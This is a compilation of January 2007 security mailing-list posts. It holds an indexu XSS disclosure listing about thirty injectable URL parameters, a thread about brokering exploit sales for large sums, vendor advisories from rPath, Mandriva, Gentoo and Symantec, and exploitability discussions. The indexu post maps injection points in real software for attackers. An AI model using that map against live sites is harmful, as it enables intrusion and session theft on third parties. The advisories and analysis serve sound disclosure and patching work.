vulnerability script indexu all versions Found by :SwEET-DeViL viP HaCkEr HaCkEr sUn TeaM AL-GaRNi Application : indexu version : all versions URL : http://www.nicecoder.com/ google : Powered by INDEXU 5. Exploits : |//1\\| in upgrade.php http://www.site.com/INDEXU_PATH/upgrade.php?pflag=upgradetruegateway=[XSS] ___or #../index.php AND Local File Include~ ## |//2\\| in suggest_category.php http://www.site.com/INDEXU_PATH/suggest_category.php?error_msg=[XSS] ## |//3\\| in user_detail.php http://www.site.com/INDEXU_PATH/user_detail.php?u=[XSS] ## |//4\\| in tell_friend.php http://www.site.com/INDEXU_PATH/tell_friend.php?friend_name=[XSS] http://www.site.com/INDEXU_PATH/tell_friend.php?friend_email=[XSS] http://www.site.com/INDEXU_PATH/tell_friend.php?error_msg=[XSS] http://www.site.com/INDEXU_PATH/tell_friend.php?my_name=[XSS] http://www.site.com/INDEXU_PATH/tell_friend.php?my_email=[XSS] http://www.site.com/INDEXU_PATH/tell_friend.php?id=[XSS] ## |//5\\| in sendmail.php http://www.site.com/INDEXU_PATH/sendmail.php?error_msg=[XSS] http://www.site.com/INDEXU_PATH/sendmail.php?email=[XSS] http://www.site.com/INDEXU_PATH/sendmail.php?name=[XSS] http://www.site.com/INDEXU_PATH/sendmail.php?subject=[XSS] ## //6\\ in send_pwd.php http://www.site.com/INDEXU_PATH/send_pwd.php?email=[XSS] http://www.site.com/INDEXU_PATH/send_pwd.php?error_msg=[XSS] http://www.site.com/INDEXU_PATH/send_pwd.php?username=[XSS] ## |//7\\| in search.php http://www.site.com/INDEXU_PATH/search.php?keyword=[XSS] ## |//8\\| http://www.site.com/INDEXU_PATH/register.php?error_msg=[XSS] http://www.site.com/INDEXU_PATH/register.php?username=[XSS] http://www.site.com/INDEXU_PATH/register.php?password=[XSS] http://www.site.com/INDEXU_PATH/register.php?password2=[XSS] http://www.site.com/INDEXU_PATH/register.php?email=[XSS] ## |//9\\| power_search.php http://www.site.com/INDEXU_PATH/power_search.php?url=[XSS] http://www.site.com/INDEXU_PATH//power_search.php?contact_name=[XSS] http://www.site.com/INDEXU_PATH//power_search.php?email=[XSS] ## |//10\\| in new.php http://www.site.com/INDEXU_PATH/new.php?path=[XSS] http://www.site.com/INDEXU_PATH//new.php?total=[XSS] ## |//11\\| in modify.php http://www.site.com/INDEXU_PATH/modify.php?pflag=searchquery=[XSS] ## |//12\\| in mailing_list.php http://www.site.com/INDEXU_PATH/mailing_list.php?error_msg=[XSS] http://www.site.com/INDEXU_PATH/mailing_list.php?email=[XSS] ## |//13\\| in login.php http://www.site.com/INDEXU_PATH/login.php?error_msg=[XSS] ## |//...$...\\| There is another vulnerability in the program, a XSS : :: ### ### :: :: ### ### :: :: ### ### ### :: :: ### ### :: :: ### ##### :: :: ### ## ### == ### ###:: :: ### ### == ### ### :: :: ###### :: :: ###### :: : ## [EMAIL PROTECTED] [EMAIL PROTECTED] (c)2007###
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're interested contact me and we'll get the ball rolling. -Simon $8000.00 USD is low! On 1/16/07 12:29 PM, K F (lists) [EMAIL PROTECTED] wrote: No offense to iDefense as I have used their services in the past... but MY Q1 2007 Challenge to YOU is to start offering your researchers more money in general! I've sold remotely exploitable bugs in random 3rd party products for more $$ than you are offering for these Vista items (see the h0n0 #3). I really think you guys are devaluing the exploit market with your low offers... I've had folks mail me like WOW iDefense offered me $800 for this remote exploit. Pfffttt not quite. We all know black hats are selling these sploits for =$25k so why should the legit folks settle for anything less? As an example the guys at MOAB kicked around selling a Quicktime bug to iDefense but in the end we decided it was not worth it due to low pay... Low Pay == Not getting disclosed via iDefense -KF I know someone who will pay significantly more per vulnerability against the same targets. On 1/10/07 12:27 PM, contributor [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Also available at: http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+cha ll enge *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in Vista IE 7.0* Both Microsoft Internet Explorer and Microsoft Windows dominate their respective markets, and it is not surprising that the decision to update to the current release of Internet Explorer 7.0 and/or Windows Vista is fraught with uncertainty. Primary in the minds of IT security professionals is the question of vulnerabilities that may be present in these two groundbreaking products. To help assuage this uncertainty, iDefense Labs is pleased to announce the Q1, 2007 quarterly challenge. Remote Arbitrary Code Execution Vulnerabilities in Vista and IE 7.0 Vulnerability Challenge: iDefense will pay $8,000 for each submitted vulnerability that allows an attacker to remotely exploit and execute arbitrary code on either of these two products. Only the first submission for a given vulnerability will qualify for the award, and iDefense will award no more than six payments of $8000. If more than six submissions qualify, the earliest six submissions (based on submission date and time) will receive the award. The iDefense Team at VeriSign will be responsible for making the final determination of whether or not a submission qualifies for the award. The criteria for this phase of the challenge are: I) Technologies Covered: - -Microsoft Internet Explorer 7.0 - -Microsoft Windows Vista II) Vulnerability Challenge Ground Rules: - -The vulnerability must be remotely exploitable and must allow arbitrary code execution in a default installation of one of the technologies listed above - -The vulnerability must exist in the latest version of the affected technology with all available patches/upgrades applied - -'RC' (Release candidate), 'Beta', 'Technology Preview' and similar versions of the listed technologies are not included in this challenge - -The vulnerability must be original and not previously disclosed either publicly or to the vendor by another party - -The vulnerability cannot be caused by or require any additional third party software installed on the target system - -The vulnerability must not require additional social engineering beyond browsing a malicious site Working Exploit Challenge: In addition to the $8000 award for the submitted vulnerability, iDefense will pay from $2000 to $4000 for working exploit code that exploits the submitted vulnerability. The arbitrary code execution must be of an uploaded non-malicious payload. Submission of a malicious payload is grounds for disqualification from this phase of the challenge. I) Technologies Covered: - -Microsoft Internet Explorer 7.0 - -Microsoft Windows Vista II) Working Exploit Challenge Ground Rules: Working exploit code must be for the submitted vulnerability only iDefense will not consider exploit code for existing vulnerabilities or new vulnerabilities
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
K F (lists) wrote: We all know black hats are selling these sploits for =$25k so why should the legit folks settle for anything less? As an example the guys at MOAB kicked around selling a Quicktime bug to iDefense but in the end we decided it was not worth it due to low pay... Low Pay == Not getting disclosed via iDefense Maybe that's all they are worth to iDefense, since they aren't monetizing them in the same way blackhats are. Maybe for some people if they were going to just give them to Microsoft anyway, a few thousand bucks is worth it. Me, for example, if I were capable of of finding such vulns, I wouldn't sell them to the guys writing the drive-by spyware installers. I might sell it to iDefense or Tippingpoint, though. BB
rPSA-2007-0008-1 gd
rPath Security Advisory: 2007-0008-1 Published: 2007-01-15 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Deterministic Denial of Service Updated Versions: gd=/[EMAIL PROTECTED]:devel//1/2.0.33-4.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0990 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2906 https://issues.rpath.com/browse/RPL-939 Description: Previous versions of the libgd package are vulnerable to two denial of service attacks, one of which has been speculated to possibly enable a code injection attack. The libgd library is not exposed via any privileged or remote interfaces within rPath Linux per se, but it is exposed by some web applications and so may enable a remote denial of service attack (application crash or unbounded CPU consumption) against those web applications.
Re: Ipswitch WS_FTP 2007 Professional wsftpurl access violation vulnerability
On 1/14/07, 3APA3A wrote: Pretending this vulnerability IS exploitable, what is security impact from it? What can you achieve by exploiting this vulnerability you cant archive without it? This is a very relevant question, as it appears from the description that the vulnerability *is* exploitable--for instance if WS_FTP 2007 handles ftp:// URLs (in whatever browser the user is using) and the user clicks a link with a specially crafted, really long ftp:// URL (or if the user is told to paste in a ftp:// link and follows the instructions). That it is not remotely exploitable in some ways does not necessarily prevent it from being exploitable by an automatic, off-site mechanism (e.g. a link on a website) in other, more basic ways requiring simple user interaction. So it could be remotely exploitable after all. On the other hand, most people don't tell their browsers to open up a separate application to handle ftp:// links. -Eliah
[ MDKSA-2007:014 ] - Updated bluez-utils packages fix hidd vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:014 http://www.mandriva.com/security/ ___ Package : bluez-utils Date: January 15, 2007 Affected: 2006.0 ___ Problem Description: hidd in BlueZ (bluez-utils) before 2.25 allows remote attackers to obtain control of the (1) Mouse and (2) Keyboard Human Interface Device (HID) via a certain configuration of two HID (PSM) endpoints, operating as a server, aka HidAttack. hidd is not enabled by default on Mandriva 2006.0. This update adds the --nocheck option (disabled by default) to the hidd binary, which defaults to rejecting connections from unknown devices unless --nocheck is enabled. The updated packages have been patched to correct this problem ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-6899 ___ Updated Packages: Mandriva Linux 2006.0: 3e4cef35413fb07be1bf17be76e82ab0 2006.0/i586/bluez-utils-2.19-7.1.20060mdk.i586.rpm 71fe8899bacb7cf75482f3deced101c4 2006.0/i586/bluez-utils-cups-2.19-7.1.20060mdk.i586.rpm 4d4e9c474520e55710458666c1624c24 2006.0/SRPMS/bluez-utils-2.19-7.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: cf217ff41df2f2abd65b86c12c15177a 2006.0/x86_64/bluez-utils-2.19-7.1.20060mdk.x86_64.rpm 26b6a142c00e22cb4fcb737f724b0bc1 2006.0/x86_64/bluez-utils-cups-2.19-7.1.20060mdk.x86_64.rpm 4d4e9c474520e55710458666c1624c24 2006.0/SRPMS/bluez-utils-2.19-7.1.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFq+jImqjQ0CJFipgRAhZWAKDI1a6x+kq1WIsXK9OWSMBCeajsvACeMbFH /4ZtTMPLJviIdhZkqlWIRzE= =pphf -END PGP SIGNATURE-
Re: Ipswitch WS_FTP 2007 Professional wsftpurl access violation vulnerability
So it could be remotely exploitable after all. On the other hand, most people don't tell their browsers to open up a separate application to handle ftp:// links. I agree. It could be exploited in the aforementioned way(but: WS_FTP is not registered to handle FTP protocol by default). Now I am thinking of something else. Could we use a specially crafted FHF file to exploit the vulnerability? I haven't checked that yet. Michal Bucko (sapheal)
[ GLSA 200701-11 ] Kronolith: Local file inclusion
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200701-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: Kronolith: Local file inclusion Date: January 16, 2007 Bugs: #156627 ID: 200701-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Kronolith contains a flaw that could allow the execution of arbitrary files. Background == Kronolith is a web-based calendar which relies on the Horde Framework for integration with other applications. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-apps/horde-kronolith2.1.4 = 2.1.4 Description === Kronolith contains a mistake in lib/FBView.php where a raw, unfiltered string is used instead of a sanitized string to view local files. Impact == An authenticated attacker could craft an HTTP GET request that uses directory traversal techniques to execute any file on the web server as PHP code, which could allow information disclosure or arbitrary code execution with the rights of the user running the PHP application (usually the webserver user). Workaround == There is no known workaround at this time. Resolution == All horde-kronolith users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-apps/horde-kronolith-2.1.4 References == [ 1 ] CVE-2006-6175 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6175 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200701-11.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpJ4Q2relTmg.pgp Description: PGP signature
Re: Trevorchan = v0.7 Remote File Include Vulnerability
[EMAIL PROTECTED] wrote: Script:Trevorchan v0.7 Fake vuln require_once($tc_config['rootdir']./inc/functions.php); require_once($tc_config['rootdir']./inc/encryption.php); These vars are initialized in config.php, which is require-d by the files you mention. Exploit: Obviously, you didn't care to test them. PLEASE STOP REPORTING FAKE PHP VULNS. Stefano
SYMSA-2007-001: Oracle Application Server 10g - Directory Traversal
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Symantec Vulnerability Research http://www.symantec.com/research Security Advisory Advisory ID: SYMSA-2007-001 Advisory Title: Oracle Application Server 10g - Directory Traversal Release Date: 16-01-2007 Application: Oracle Application Server 10g Release 3 (10.1.3.0.0) Platform: Windows and possibly others Severity: Remotely exploitable / User access Author: Oliver Karow / [EMAIL PROTECTED] Vendor status: Verified by Vendor, Update Available CVE Number: CVE-2007-0222 Reference: http://www.securityfocus.com/bid/22027 Overview: - From Oracle's web site: Oracle Application Server 10g offers a comprehensive solution for developing, integrating, and deploying your enterprise's applications, portals, and Web services. Based on a powerful and scalable J2EE server, Oracle Application Server 10g provides complete business integration and business intelligence suites, and best-of-breed portal software. Oracle Application Server 10g is the only platform designed for grid computing as well as full lifecycle support for Service-Oriented Architecture (SOA). A vulnerable server side component allows remote access to files outside of the application's root directory with permissions of the LocalSystem process. No authentication is required. Details: The server side component EmChartBean is part of the Oracle Enterprise Manager 10g Application Server Control Software. EmChartBean is vulnerable to a directory traversal attack. The vulnerability can be exploited by sending an unauthenticated http GET request. Remote access is granted to files outside of the application's root directory with permissions of the Javaw.exe process, which by default runs with LocalSystem privileges. The server side component EmChartBean only exists at runtime, and is unpacked from a JAR file after an initial call to the login page. Thus, a single request to the login page is required before an attacker can successfully exploit the vulnerability. Vendor Response: The fix for this security vulnerability is included in Oracle's January 2007 Critical Patch Update. The Critical Patch Update advisory, which lists the versions affected and contains links to more information and patches, is available at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html The main page for Oracle Critical Patch Updates and Security Alerts is available at: http://www.oracle.com/technology/deploy/security/alerts.htm Recommendation: Follow your organization's testing procedures before applying patches or workarounds. Symantec recommends that customers should apply Oracle's update as soon as possible. Oracle strongly recommends applying the Oracle Enterprise Manager patches released with the January 2007 Critical Patch Update to all instances affected by this problem. Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CVE-2007-0222 - ---Symantec Vulnerability Research Advisory Information--- For questions about this advisory, or to report an error: [EMAIL PROTECTED] For details on Symantec's Vulnerability Reporting Policy: http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf Symantec Vulnerability Research Advisory Archive: http://www.symantec.com/enterprise/research/archive.jsp Symantec Vulnerability Research GPG Key: http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc - -Symantec Product Advisory Information- To Report a Security Vulnerability in a Symantec Product: [EMAIL PROTECTED] For general information on Symantec's Product Vulnerability reporting and response: http://www.symantec.com/security/ Symantec Product Advisory Archive: http://www.symantec.com/avcenter/security/SymantecAdvisories.html Symantec Product Advisory PGP Key: http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc - --- Copyright (c) 2007 by Symantec Corp. Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Symantec Vulnerability Research. Reprinting the whole or part of this alert in any medium other than electronically requires permission from [EMAIL PROTECTED] Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential
Re: WMF CreateBrushIndirect vulnerability (DoS)
The following WMF exploit appeared on milw0rm today: http://www.milw0rm.com/exploits/3111 Another 'old new thing' (i.e. plagiarism): http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048530.html http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048547.html The vulnerability is a result of the WMF parser passing a value from the file as a pointer argument to the CreateBrushIndirect function. The function dereferences the pointer and dies with an access violation. The value in the file is only 16-bit and it is sign extended into a 32-bit pointer. This means that we can only access addresses from 0x to 0x and from 0x to 0x. Both of these ranges are always invalid, so the vulnerability is just a DoS. For more details and some commentary, see: http://determina.blogspot.com/2007/01/whats-wrong-with-wmf.html
